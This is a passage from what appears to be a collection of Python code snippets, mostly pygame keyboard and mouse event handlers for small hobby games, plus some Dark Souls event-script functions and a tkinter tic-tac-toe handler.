player_one_won(WIN)\n if game.is_winner(2):\n player_two_won(WIN)\n\n #Reset game if backspace is pressed. 
\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_BACKSPACE:\n game = QuoridorGame()\n\n #Update display window\n pygame.display.update()\n\n pygame.quit()", "def handle_continuous_keys(self):\n shift = pygame.K_LSHIFT in self.held\n ctrl = pygame.K_LCTRL in self.held\n factor = 3 if shift else 1/3 if ctrl else 1\n for key in self.held:\n if not self.followmode:\n # if self.held_delay[key] == 0:\n if key in (pygame.K_w, pygame.K_UP): # up\n # self.canvas.move_offset(0, 5 * factor)\n self.canvas.move_focus(0, 5 * factor)\n elif key in (pygame.K_s, pygame.K_DOWN): # down\n # self.canvas.move_offset(0, -5 * factor)\n self.canvas.move_focus(0, -5 * factor)\n elif key in (pygame.K_d, pygame.K_RIGHT): # right\n # self.canvas.move_offset(-5 * factor, 0)\n self.canvas.move_focus(5 * factor, 0)\n elif key in (pygame.K_a, pygame.K_LEFT): # left\n # self.canvas.move_offset(5 * factor, 0)\n self.canvas.move_focus(-5 * factor, 0)\n if key in (pygame.K_e, pygame.K_KP_PLUS):\n self.canvas.zoom(2 * factor)\n elif key in (pygame.K_q, pygame.K_KP_MINUS):\n self.canvas.zoom(-2 * factor)\n for key in self.held:\n self.held_delay[key] = (self.held_delay[key] + 1) % 5", "def check_player_events(ai_settings, screen, player, projectiles):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n check_keyDown(event, ai_settings, screen, player, projectiles)\n elif event.type == pygame.KEYUP:\n check_keyUp(event, player)", "def find_choice_event(self, events):\n for event in events:\n if (event.type == pygame.KEYDOWN and event.key in (pygame.K_LEFT, pygame.K_RIGHT)) or \\\n (event.type == BUTTON_DOWN and event.pin == self.button_picture) or \\\n (event.type == BUTTON_DOWN and event.pin == self.button_print):\n return event", "def handle_events(self):\n keys = pygame.key.get_pressed()\n if self.game_manager.game_state == GameState.Running:\n if self.arcade:\n self.game_manager.control_players_arcade(self.joysticks) \n else:\n self.game_manager.control_players(keys)\n elif self.arcade:\n self.ui.arcade_control(self.joysticks[1])\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_manager.game_state = GameState.Quit \n if self.game_manager.game_state == GameState.Finished or\\\n self.game_manager.game_state == GameState.Menu :\n if event.type == pygame.KEYDOWN and not self.arcade:\n self.ui.control(event.key)\n #self.start_new_game(GameMode.EatToSurvive)", "def handle_event(self, event: Event) -> bool:\n\n if event.type == pygame.KEYUP:\n if event.key in [pygame.K_UP, pygame.K_RIGHT, pygame.K_DOWN, pygame.K_LEFT, pygame.K_SPACE]:\n self.our_board.rotate_ship_drawing()\n return True\n\n elif event.type == pygame.MOUSEMOTION:\n if self.our_board.handle_mouse_hover(event.pos[0], event.pos[1]) == HANDLED:\n return True\n\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.our_game_state == STATE_PREPARING \\\n and self.our_board.toggle_ship_click(event.pos[0], event.pos[1]) == HANDLED:\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n else:\n if self.our_game_state == STATE_PREPARING:\n self.start_game_button.check_click(event.pos[0], event.pos[1])\n return True\n else:\n self.their_board.make_move_click(event.pos[0], event.pos[1])\n return True\n\n elif event.type == pygame.USEREVENT:\n if event.action == ACTION_FIND_ME:\n if not event.team_id == self.our_team_id and self.their_team_id is None:\n self.their_team_id = event.team_id\n print(f\" Their team ID is [ {self.their_team_id} 
].\")\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n\n elif event.action == ACTION_HIT and event.team_id == self.their_team_id:\n self.their_board.record_hit(event.row, event.col)\n if self.their_board.is_every_position_hit():\n self.change_game_state(STATE_OUR_WIN)\n return True\n else:\n self.change_game_state(STATE_THEIR_TURN)\n return True\n\n elif event.action == ACTION_MAKE_MOVE and self.our_game_state == STATE_OUR_TURN:\n self.their_board.record_firing(event.row, event.col)\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_MOVE}|{event.row}|{event.col}\")\n return True\n\n elif event.action == ACTION_MISS and event.team_id == self.their_team_id:\n self.their_board.record_miss(event.row, event.col)\n self.change_game_state(STATE_THEIR_TURN)\n return True\n\n elif event.action == ACTION_MOVE:\n if event.team_id == self.their_team_id and self.our_board.check_move(event.row, event.col) == HANDLED:\n if self.our_board.is_every_position_hit():\n self.change_game_state(STATE_THEIR_WIN)\n else:\n self.change_game_state(STATE_OUR_TURN)\n return True\n\n elif event.action == ACTION_READY_TO_START:\n self.their_game_state = STATE_READY_TO_START\n if self.our_game_state == STATE_PREPARING:\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n elif self.our_game_state == STATE_READY_TO_START:\n self.start_game()\n return True\n\n elif event.action == ACTION_STATUS:\n self.game_status.update_text(event.text)\n return True\n\n elif event.action == ACTION_WE_GOT_HIT:\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_HIT}|{event.row}|{event.col}\")\n return False\n\n elif event.action == ACTION_WE_WERE_MISSED:\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_MISS}|{event.row}|{event.col}\")\n return False\n\n # If we got this far, then this event isn't of a type that we care about. So, we'll do\n # nothing. 
We'll also return False, meaning that the screen does not need to redraw.\n return False", "def event2510():\n header(2510)\n\n wait(0.2) # Wait for previous trigger effects to go away.\n\n if_event_flag_on(1, EVENT.SableRuneActive)\n\n if_player_has_special_effect(-1, SPEFFECT.RunicHit0)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit1)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit2)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit3)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit4)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit5)\n if_condition_true(2, -1)\n if_event_flag_on(3, EVENT.DarkAnorLondo)\n if_in_world_area(-2, 10, 1)\n if_in_world_area(-2, 10, 2)\n if_in_world_area(-2, 14, 0)\n if_in_world_area(-2, 15, 0)\n if_in_world_area(-2, 15, 1)\n if_in_world_area(-2, 17, 0)\n if_in_world_area(-2, 18, 1)\n if_condition_true(3, -2)\n if_condition_true(-3, 3)\n if_event_flag_on(4, EVENT.EarlyOolacile)\n if_in_world_area(4, 12, 1)\n if_condition_true(-3, 4)\n if_condition_true(2, -3)\n if_condition_true(-4, 2)\n\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive0)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive1)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive2)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive3)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive4)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive5)\n if_condition_true(5, -5)\n if_player_has_special_effect(5, SPEFFECT.SableRuneTempTrigger)\n if_condition_true(-4, 5)\n\n if_condition_true(1, -4)\n\n if_condition_true(0, 1)\n\n # Cancel any previous Sable buffs.\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune0)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune1)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune2)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune3)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune4)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune5)\n\n # Apply appropriate level of Sable Rune effect, and register appropriate no-weapon condition.\n if_player_has_special_effect(5, SPEFFECT.RunicHit0)\n skip_if_condition_false(2, 5)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune0)\n restart()\n\n if_player_has_special_effect(6, SPEFFECT.RunicHit1)\n skip_if_condition_false(2, 6)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune1)\n restart()\n\n if_player_has_special_effect(7, SPEFFECT.RunicHit2)\n skip_if_condition_false(2, 7)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune2)\n restart()\n\n if_player_has_special_effect(-5, SPEFFECT.RunicHit3)\n skip_if_condition_false(2, -5)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune3)\n restart()\n\n if_player_has_special_effect(-6, SPEFFECT.RunicHit4)\n skip_if_condition_false(2, -6)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune4)\n restart()\n\n if_player_has_special_effect(-7, SPEFFECT.RunicHit5)\n skip_if_condition_false(1, -7)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune5)\n\n restart()", "def check_keyup_events(event, rock):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\trock.moving_right = False\r\n\t\t\t\t\r\n\telif event.key == pygame.K_LEFT:\r\n\t\trock.moving_left = False\r\n\t\r\n\telif event.key == pygame.K_UP:\r\n\t\trock.moving_up = False\r\n\t\t\t\t\r\n\telif event.key == pygame.K_DOWN:\r\n\t\trock.moving_down = False", "def handle_input_event(self):\n\n self.markerPos = self.get_mouse_coordinate()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n raise 
QuitRequestedError\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n raise QuitRequestedError\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Event.is_valid_placement_stage(self.event):\n self.choice = self.get_mouse_coordinate()\n self.event = Event.next(self.event)\n self.timestep_watch.reset()\n\n liberties = self.env.liberty_after_next_steps(self.env.turn, self.env.getOpponent())\n self.env.printField(liberties)\n print()\n # self.env.printFlipNum(self.env.turn)\n # print(self.env.update_num_disks_can_filp(self.choice[0], self.choice[1], self.env.turn))\n\n # print(\"Click \", pos, \"coordinates: \", row, col)", "def check_events(rk_settings, screen, rock, bullets):\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\t\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tcheck_keydown_events(event, rk_settings, screen, rock, bullets)\r\n\t\t\t\t\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tcheck_keyup_events(event, rock)", "def check_events(ai_settings,screen,stats,play_button,ship,bullets,shot):\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tcheck_keydown_events(event,ai_settings,screen,ship,bullets,shot)\n\t\telif event.type == pygame.KEYUP:\n\t\t\tcheck_keyup_events(event, ship)\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_x, mouse_y = pygame.mouse.get_pos()\n\t\t\tcheck_play_button(ai_settings,screen,stats,play_button,ship,bullets,mouse_x,mouse_y)", "def check_events_prepare_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n for i in range(1,7):\n # Display edit/delete buttons\n if Rect(85 + 180* (i-1), 165, 130,110).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list_index = str(i)\n\n # Click on Edit\n elif Rect(85 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list = make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2)\n if 'CHARACTER_' + str(i) in line:\n user.character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n screen_status.build_deck_screen_display = True\n screen_status.prepare_screen_display = False\n\n # Click on Delete\n elif Rect(155 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n\n with open('user_deck_list_string.txt','a+') as f:\n\n f.seek(0)\n x = f.readlines()\n y = 1\n\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n else:\n break\n\n del x[y-1] # Delete DECK_LIST_\n del x[y-1] # Delete CHARACTER_\n\n with open('user_deck_list_string.txt','w') as f:\n f.writelines(x)\n\n user.deck_list_index = 'new'\n\n # Click on one of the opponent's deck\n for i in range(1,9):\n if i <= 4:\n if Rect(70 + 160* (i-1), 395, 
130,180).collidepoint(pygame.mouse.get_pos()):\n player2.character_ai_index = str(i)\n else:\n if Rect(70 + 160* (i-5), 585, 130,180).collidepoint(pygame.mouse.get_pos()):\n player2.character_ai_index = str(i)\n\n # Click and pick a difficulty\n for i in range(1,5):\n if Rect(710, 445 + 80*(i-1),410,70).collidepoint(pygame.mouse.get_pos()):\n player2.ai_difficulty_index = str(i)\n\n\n\n # back\n if Rect(0,0,50,50).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = True\n screen_status.prepare_screen_display = False\n\n # play\n elif Rect(1150,0,50,50).collidepoint(pygame.mouse.get_pos()):\n prepare_screen_to_battle_screen_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n if button_status.prepare_screen_end_screen_warning_button_display == '':\n screen_status.battle_screen_display = True\n screen_status.prepare_screen_display = False\n\n # user.random_deck_list = random.sample(user.deck_list, len(user.deck_list))\n # user.remain_deck_list = user.random_deck_list[6:]\n # user.hand_list = user.random_deck_list[0:6]\n\n # click on ok on end screen warning sign\n elif Rect(1100, 62, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.prepare_screen_end_screen_warning_button_display = ''\n\n # Change name\n elif Rect(780, 10, 110, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.text_input_box_display = True\n\n # create new deck\n elif Rect(1020, 110, 120, 35).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n\n else:\n user.deck_list_index = 'new'\n user.deck_list = []\n user.character_card = ''\n screen_status.build_deck_screen_display = True\n screen_status.prepare_screen_display = False\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n\n # Opponent characters\n for i in range(1,5):\n if Rect(70 + 160* (i-1), 395, 130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'prepare_screen'\n button_status.card_zoom_part_indicator = 'opponent character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n for i in range(5,9):\n if Rect(70 + 160* (i-5), 585, 130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'prepare_screen'\n button_status.card_zoom_part_indicator = 'opponent character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n\n if x == 0:\n button_status.card_zoom_active = False", "def check_events(si_settings, screen, stats, sb, menu, play_button, high_scores, ship, aliens, bullets, alienBullets, images):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n check_keydown_events(event, si_settings, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n check_play_button(si_settings, screen, stats, sb, play_button, ship, aliens, bullets, alienBullets, images, mouse_x, mouse_y)\r\n check_high_scores(si_settings, menu, high_scores, mouse_x, mouse_y)\r\n elif event.type == pygame.MOUSEMOTION:\r\n check_button_hover(pygame.mouse.get_pos(), play_button, high_scores)", "def check_click(self, mouse_x, mouse_y):\r\n # Change the x/y screen coordinates to grid 
coordinates\r\n column = mouse_x // 70\r\n row = mouse_y // 70\r\n\r\n if row in [0, 9] or column in [0, 9]:\r\n self.shoot_ray(row, column)\r\n elif 0 < row < 9 and 0 < column < 9:\r\n self.guess_atom(row, column)", "def play_game(self):\n\n while True:\n self.pixels = [clear] * 64\n\n # sense HAT controller\n for event in self.sense.stick.get_events():\n if event.action == \"pressed\":\n if event.direction == \"up\":\n self.set_direction(0)\n elif event.direction == \"right\":\n self.set_direction(1)\n elif event.direction == \"down\":\n self.set_direction(2)\n elif event.direction == \"left\":\n self.set_direction(3)\n # insert to the start of the array\n self.trail.insert(0, [self.trail[0][0] + self.direction[0], self.trail[0][1] + self.direction[1]])\n\n # one border cross in and the other off\n if self.trail[0][0] < 0:\n self.trail[0][0] = 7\n if self.trail[0][1] < 0:\n self.trail[0][1] = 7\n if self.trail[0][0] > 7:\n self.trail[0][0] = 0\n if self.trail[0][1] > 7:\n self.trail[0][1] = 0\n\n # we cover the situation, when the apple pos is a snake pos in this if statement\n if self.trail[0] == self.apple_pos:\n self.apple_pos = []\n while self.apple_pos == []:\n self.apple_pos = [random.randint(0, 7), random.randint(0, 7)]\n if self.apple_pos in self.trail:\n self.apple_pos = []\n self.length += 1\n # snake runs into itself\n elif self.trail[0] in self.trail[1:]:\n self.length = 1\n else:\n while len(self.trail) > self.length:\n # remove from the end ( \"like\" moving, but the length is correct)\n self.trail.pop()\n\n for pos in self.trail:\n # snake visualize on the pixel map (2d coord to 1d coord)\n self.pixels[pos[1] * 8 + pos[0]] = white\n\n # y * rowSize + x -> coordinate convert because of the pixel map\n self.pixels[self.apple_pos[1] * 8 + self.apple_pos[0]] = red\n # apple position (red led)\n self.sense.set_pixels(self.pixels)\n\n time.sleep(0.15)", "def check_events(self):\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.ai_game.quit()\r\n elif event.type == pg.KEYDOWN:\r\n self._check_keydown_events(event)\r\n elif event.type == pg.KEYUP:\r\n self._check_keyup_events(event)\r\n elif event.type == pg.MOUSEBUTTONDOWN:\r\n mouse_pos = pg.mouse.get_pos()\r\n self._check_button(mouse_pos)", "def catchGameEvents(self, is_player, fpsclock, screen):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.exit()\n return True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n return self.pauseMenu(fpsclock, screen)\n if is_player:\n self.playEvents(event)\n return False", "def event11510130():\n header(11510130, 1)\n\n skip_if_event_flag_off(3, EVENT.AnorLondoGwynWarp)\n chr.disable(CHR.DarkwraithInBossRoom)\n chr.disable(CHR.SilverKnightArcherNearBossFog)\n end()\n\n # Changes to make when Dark Anor Londo begins\n skip_if_event_flag_on(10 + 2 * len(Darkwraiths), EVENT.DarkAnorLondo)\n chr.disable(6640)\n chr.disable(6650)\n chr.disable(CHR.ChapelMimic)\n chr.disable(CHR.AbyssalPrinceJareel)\n for darkwraith in Darkwraiths:\n chr.disable(darkwraith)\n if_event_flag_on(0, EVENT.DarkAnorLondo)\n chr.enable(6640)\n chr.enable(6650)\n chr.enable(CHR.ChapelMimic)\n chr.enable(CHR.AbyssalPrinceJareel)\n chr.disable_ai(CHR.AbyssalPrinceJareel) # maybe redundant\n for darkwraith in Darkwraiths:\n chr.enable(darkwraith)\n\n # Skips to here if Dark Anor Londo has already started.\n # Disable chapel chest (replaced by Mimic).\n obj.disable(OBJ.ChapelChest)\n obj.disable_activation(OBJ.ChapelChest, -1)\n for enemy_id in 
DarkAnorLondoAllies:\n chr.set_team_type(enemy_id, TeamType.fighting_ally)\n # Move Palace archer.\n warp.short_warp(1510301, 'region', REGION.MoveArcherInDarkPalace, -1)\n for enemy_id in DarkAnorLondoDisabled:\n chr.disable(enemy_id)\n for painting_guardian_id in range(1510150, 1510159):\n # Disable Painting Guardians on the floor (except one getting killed).\n chr.disable(painting_guardian_id)\n skip_if_event_flag_on(1, 11510861) # Skip if Darkmoon Guardian is already dead.\n warp.warp(CHR.DarkmoonGuardian, 'region', 1512451, -1)\n end_if_event_flag_on(1034) # Stop here if Darkmoon Knightess is already dead.\n warp.warp(CHR.DarkmoonKnightess, 'region', 1512450, -1)\n chr.set_nest(CHR.DarkmoonKnightess, 1512450)\n chr.set_standby_animation_settings_to_default(CHR.DarkmoonKnightess)", "def check_keyup_events(event, hero):\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n hero.moving_right = False\n if event.key == pygame.K_LEFT or event.key == pygame.K_a:\n hero.moving_left = False\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n hero.moving_up = False\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n hero.moving_down = False", "def event_m20_11_x28(z104=20111500, z106=38, z107=12, z108=1, goods2=60536000):\n \"\"\"State 0,1: Dialog display\"\"\"\n # action:3000:\"⑱: Move\"\n DisplayYesNoMenu(3000, 1.8, z104, 190, 0, 0, 0)\n # action:1002:\"Use %s?\", goods:60536000:Pharros' Lockstone\n DisplayYesNoMenu(1002, 1.8, z104, 190, 2, goods2, 0)\n assert YesNoMenuDisplay() != 1\n \"\"\"State 2: Result judgment\"\"\"\n if (YesNoMenuResult() == 1) != 0:\n \"\"\"State 7: Bug key transition waiting: 30\"\"\"\n ChangeObjState(z104, 30)\n assert CompareObjStateId(z104, 30, 0)\n \"\"\"State 4: Action request to player\"\"\"\n ObjAnimationPlayerControlRequest(z104, z106, z107)\n assert PlayerIsInEventAction(z107) != 0\n \"\"\"State 5: OBJ status judgment\"\"\"\n IsPlayerPlayingMotion(0, z107, 0)\n # goods:60536000:Pharros' Lockstone\n DoesPlayerHaveItem(0, goods2, 0, 5, 1, 1, 0)\n CompareObjState(1, z104, 74, 0)\n CompareObjState(1, z104, 20, 0)\n if ConditionGroup(0):\n pass\n elif ConditionGroup(1):\n \"\"\"State 6: Insect key consumption\"\"\"\n # goods:60536000:Pharros' Lockstone\n ConsumeItem(goods2, z108)\n assert CompareObjStateId(z104, 20, 0)\n \"\"\"State 9: End state\"\"\"\n return 0\n else:\n pass\n \"\"\"State 8: Bug key: Initial state: 10\"\"\"\n ChangeObjState(z104, 10)\n \"\"\"State 3: Rerun\"\"\"\n RestartMachine()", "def detectMouse(self):\n self.runMouse()\n time.sleep(0.1)\n searching = True\n while searching:\n for dev in self.mouses:\n if self.hitsMouses[dev]:\n return(dev)\n #time.sleep(0.0001)", "def manual_input(self):\r\n atom_list = []\r\n while len(atom_list) < 4:\r\n for event in pygame.event.get():\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n column = mouse_x // 70\r\n row = mouse_y // 70\r\n if 0 < column < 9 and 0 < row < 9:\r\n if (row, column) not in atom_list:\r\n atom_list.append((row, column))\r\n return atom_list", "def skip_if_key_pressed(self):\n register = (self.opcode & 0xF00) >> 8\n key = self.registers[register]\n keys = pygame.key.get_pressed()\n if keys[ord(config.keys[key])]:\n self.pc += 2\n logger.info(\"Skipped {} because {} was pressed\".format(\n self.memory[self.pc + 2],\n key))", "def _check_keyup_events(self, event):\r\n if event.key == pg.K_RIGHT:\r\n self.ship.moving_right = False\r\n elif event.key == pg.K_LEFT:\r\n self.ship.moving_left = False", "def 
evaluate(self,joystick,keys):\n \n self.AG_twinklers.do() \n \n \n if joystick.isUp(keys)==True and self.solomon.current_state[\"jumping\"]==0: \n self.solomon.current_state[\"jumping\"]=1 \n\n\n walkcheck=False\n \n if self.solomon.A_wandswish.overide==False:\n \n self.solomon.current_state[\"wandswish\"]=0 \n\n if joystick.isDown(keys)==True: \n self.solomon.current_state[\"crouching\"]=1 \n self.solomon.current_state[\"standing\"]=0\n else: \n self.solomon.current_state[\"crouching\"]=0 \n \n if joystick.isRight(keys)==True:\n self.solomon.facing=1 \n self.solomon.current_state[\"walking\"]=1\n self.solomon.current_state[\"standing\"]=1\n walkcheck=True\n elif joystick.isLeft(keys)==True: \n self.solomon.facing=-1 \n walkcheck=True\n self.solomon.current_state[\"walking\"]=1\n self.solomon.current_state[\"standing\"]=0\n else:\n self.solomon.current_state[\"walking\"]=0 \n self.solomon.current_state[\"standing\"]=1\n\n canwalk=False\n if walkcheck:\n result=self.detect(self.solomon.x+self.solomon.facing*self.solomon.step*5.0,self.solomon.y) \n if (len(result)==0 or result[0][0]==\".\") and self.solomon.current_state[\"walking\"]==1:\n #self.solomon.x+=self.solomon.step*self.solomon.facing \n self.solomon.current_state[\"standing\"]=0 \n self.solomon.current_state[\"walking\"]=1\n canwalk=True\n #elif result[0][0] in [\"]\n\n result1=self.grid[int(self.solomon.y-0)][int(self.solomon.x+0.5+self.solomon.step*2*self.solomon.facing)]\n result2=self.grid[int(self.solomon.y-0)][int(self.solomon.x+0.5-self.solomon.step*2*self.solomon.facing)]\n #print \"fall check\" + str((result1,result2,self.solomon.x,self.solomon.y))\n if result1==\".\" and result2==\".\":\n self.solomon.y-=self.solomon.step\n self.solomon.current_state[\"walking\"]=0\n canwalk=False\n\n if canwalk==True: self.solomon.x+=self.solomon.step*self.solomon.facing\n\n if joystick.isFire(keys)==True and self.solomon.current_state[\"wandswish\"]==0: \n self.solomon.A_wandswish.kick()\n self.solomon.A_wandswish.overide=True\n self.solomon.current_state[\"wandswish\"]=1 \n\n \n if self.solomon.current_state[\"jumping\"]==1:\n self.solomon.AG_jump.do()\n print \"he's jumping\"\n print str(self.solomon.AG_jump.action(\"jump_displacement\").tick)\n self.solomon.y+=0.2\n #print \"co-ordinates \"+str((self.solomon.x,self.solomon.y))", "def handle_key_events():\n playing = True\n for event in pygame.event.get():\n # Allow the user to quit\n if event.type==QUIT:\n playing = False\n if event.type==KEYDOWN and event.key == K_ESCAPE:\n playing = False\n\n # If the user clicks on a picture, do some breeding\n if event.type==MOUSEBUTTONUP:\n mouse_pos = pygame.mouse.get_pos()\n picture_index = point_to_picture(mouse_pos)\n\n global pictures\n if (picture_index >= 0 and picture_index < len(pictures)):\n picture = pictures[picture_index]\n pictures = create_new_generation(picture, picture_index)\n\n return playing", "def play(self, event):\n if self.num_clicks == 1:\n self.clickable(event)\n if len(self.canvas.find_withtag(\"selected\")) == 2:\n self.num_of_tries += 1\n print(f'Number of tries {self.num_of_tries}')\n if self.num_of_tries > 13:\n self.score -= 10\n self.score_label.config(text=f'Score: {self.score}')\n self.check_match(self.click_tiles)\n self.canvas.after(self.delay, self.flip_back)\n self.click_tiles.clear()\n self.num_clicks = 0\n else:\n self.clickable(event)", "def handle_keys(self):\n handled = 0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n end_game()\n elif event.type == pygame.KEYDOWN:\n if handled 
and event.key in (pygame.K_DOWN, pygame.K_UP, pygame.K_LEFT, pygame.K_RIGHT):\n pygame.event.post(event)\n break\n if event.key == pygame.K_UP:\n self.snake.turn(self.snake.up)\n handled = True\n elif event.key == pygame.K_DOWN:\n self.snake.turn(self.snake.down)\n handled = True\n elif event.key == pygame.K_LEFT:\n self.snake.turn(self.snake.left)\n handled = True\n elif event.key == pygame.K_RIGHT:\n self.snake.turn(self.snake.right)\n handled = True", "def _check_keyup_events(self, event):\t\n\t\tif event.key == pygame.K_RIGHT:\n\t\t\tself.pigeon.moving_right = False\n\t\telif event.key == pygame.K_LEFT:\n\t\t\tself.pigeon.moving_left = False", "def check_replay_button(self, mouse_x, mouse_y):\r\n for button in self._replay_button_list:\r\n if button.get_button_rect().collidepoint(mouse_x, mouse_y):\r\n button_clicked = button\r\n break\r\n else:\r\n button_clicked = None\r\n\r\n if button_clicked is not None and button_clicked.get_num_atom() == 1:\r\n self.setup_new_game()\r\n elif button_clicked is not None and button_clicked.get_num_atom() == 2:\r\n sys.exit()", "def main(win):\n\tbird = Bird()\n\tpipes = []\n\n\tclock = pygame.time.Clock()\n\tlost = False\n\n\trun = True\n\twhile run:\n\t\tclock.tick(30)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\t\t\t\tbreak\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tbird.jump()\n\t\t\t\t\tprint(\"jump\")\n\n\t\tbird.move()\n\n\t\tfor pipe in pipes:\n\t\t\tif pipe.collide(bird.x, bird.y):\n\t\t\t\tprint(\"bird hit pipe\")\n\t\t\t\tlost = True\t\n\n\t\tif lost:\n\t\t\tbreak\n\n\tbird.die()\n\tend_screen()", "def MouseClick(event):\r\n global player\r\n global winner\r\n Window.focus_set()\r\n x = event.x // 100 # convertit une coordonée pixel écran en coord grille de jeu\r\n y = event.y // 100\r\n if ( (x<0) or (x>2) or (y<0) or (y>2) ) : return\r\n \r\n print(\"clicked at\", x,y)\r\n hasPlay = Play(x,y,player) # on regarde si le joueur a jouer correctement\r\n if hasPlay:\r\n newPlayer() # dans ce cas là on change de joueur \r\n winner = Victoire()\r\n if (winner or MatchNul()):\r\n Dessine(winner)\r\n Window.update()\r\n Window.after(3000)\r\n ResetGame(winner)\r\n Dessine(winner)\r\n return\r\n Dessine(winner)\r\n if hasPlay: # si le joueur a bien joué, alors c'est au tour de l'ia\r\n Window.update()\r\n Window.after(3000)\r\n thisIsIA()", "def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.rocket.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.rocket.moving_left = False\n elif event.key == pygame.K_UP:\n self.rocket.moving_up = False\n elif event.key == pygame.K_DOWN:\n self.rocket.moving_down = False", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n self.sleep_time = 0\n return\n\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n\n if self.button.collidepoint(pos):\n if self.state == 